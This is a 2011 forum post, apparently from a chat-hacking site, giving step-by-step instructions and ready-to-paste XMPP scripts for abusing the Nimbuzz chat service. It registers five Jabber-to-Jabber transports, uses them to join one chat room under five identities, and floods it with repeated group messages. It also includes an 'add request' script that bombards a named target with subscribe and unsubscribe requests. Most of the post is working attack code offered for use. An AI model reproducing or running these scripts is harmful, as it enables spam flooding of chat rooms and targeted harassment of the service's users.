Please Login or Sign up for full access.
Please Login or Sign up for full access.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

HomeGalleryLatest imagesSearchRegisterLog in

{Flood room with 5 Jids 4rm mobile thro bombus & add request}

Go down 
AuthorMessage
opsingh
Admin
opsingh

{Flood room with 5 Jids 4rm mobile thro bombus & add request} Empty
PostSubject: {Flood room with 5 Jids 4rm mobile thro bombus & add request}   {Flood room with 5 Jids 4rm mobile thro bombus & add request} EmptyJanuary 8th 2011, 1:21 am

First make an account at talk.mipt.ruusername - badboypassword - *****server -talk.mipt.ruhost/ip - blankmark- register accnow u have to add 5 transports1- j2j-unstable.Jrudevels.Org2- j2j.Jabber.Kirovnet.Ru3- j2j.talk.mipt.ru4- j2j.jabber.mipt.ru5- j2j.mo.pp.ruthese are the 5 transports you have to add with scriptCode:<iq to="TRANSPORT NAME HERE"type="set" id="discoResult"><query xmlns="jabber:iq:register"><x xmlns="jabber:x:data" type="submit"><field var="username" type="text-single"><value>YOUR ID HERE</value></field><field var="p_ass_word" type="text-private"><value>p_ass_word HERE</value></field><field var="server" type="text-single"><value>nimbuzz.com</value></field><field var="domain" type="text-single"><value>openfire.nimbuzz.com</value></field><field var="port" type="text-single"><value>5222</value></field></x></query></iq>Before adding transports go to option and mark auto add new new contactsNow this is join room script with 5 ids..Code:<presence to="ROOM NAME%conference.nimbuzz.com@j2j-unstable.Jrudevels.Org/YOURID 1">type="available"><status></status></presence><presence to="ROOM NAME%conference.nimbuzz.com@j2j.Jabber.Kirovnet.Ru/YOURID 2">type="available"><status></status></presence><presence to="ROOM NAME%conference.nimbuzz.com@j2j.talk.mipt.ru/YOUR ID 3">type="available"><status></status></presence><presence to="ROOM NAME%conference.nimbuzz.com@j2j.jabber.mipt.ru/YOUR ID 4">type="available"><status></status></presence><presence to="ROOM NAME%conference.nimbuzz.com@j2j.mo.pp.ru/YOUR ID 5">type="available"><status></status></presence>NOW WHEN YOU JOIN ROOM YOUHAVE TO FLOO AND FLOOD SCRIPT IS HERECode:<message to="ROOM NAME%conference.nimbuzz.com@j2j-unstable.Jrudevels.Org" type="groupchat" id="me"><body>DONT MESS WID Me__@:*</body></message><message to="ROOM NAME%conference.nimbuzz.com@j2j.Jabber.Kirovnet.Ru" type="groupchat" id="me"><body>DONT MESS WID Me__@:*</body></message><message to="ROOM NAME%conference.nimbuzz.com@j2j.talk.mipt.ru" type="groupchat" id="me"><body>DONT MESS WID Me__@:</body></message><message to="ROOM NAME%conference.nimbuzz.com@j2j.jabber.mipt.ru" type="groupchat" id="me"><body>DONT MESS WID Me__@:</body></message><message to="ROOM NAME%conference.nimbuzz.com@j2j.mo.pp.ru" type="groupchat" id="me"><body>DONT MESS WID Me__@:*</body></message>addrquest scriptCode:<presence to="TARGET ID%nimbuzz.com@j2j-unstable.Jrudevels.Org" type="subscribe"/><presence to="TARGET ID%nimbuzz.com@j2j-unstable.Jrudevels.Org" type="unsubscribe"/><presenceto="TARGET ID%nimbuzz.com@j2j.Jabber.Kirovnet.Ru" type="subscribe"/><presence to="TARGET ID%nimbuzz.com@j2j.Jabber.Kirovnet.Ru" type="unsubscribe"/><presenceto="TARGET ID%nimbuzz.com@j2j.talk.mipt.ru" type="subscribe"/><presence to="TARGET ID%nimbuzz.com@j2j.talk.mipt.ru" type="unsubscribe"/><presenceto="TARGET ID%nimbuzz.com@j2j.jabber.mipt.ru" type="subscribe"/><presence to="TARGET ID%nimbuzz.com@j2j.jabber.mipt.ru" type="unsubscribe"/><presenceto="TARGET ID%nimbuzz.com@j2j.mo.pp.ru" type="subscribe"/><presence to="TARGET ID%nimbuzz.com@j2j.mo.pp.ru" type="unsubscribe"/>
Back to top Go down
http://www.grandcodes.org

{Flood room with 5 Jids 4rm mobile thro bombus & add request}
Page 1 of 1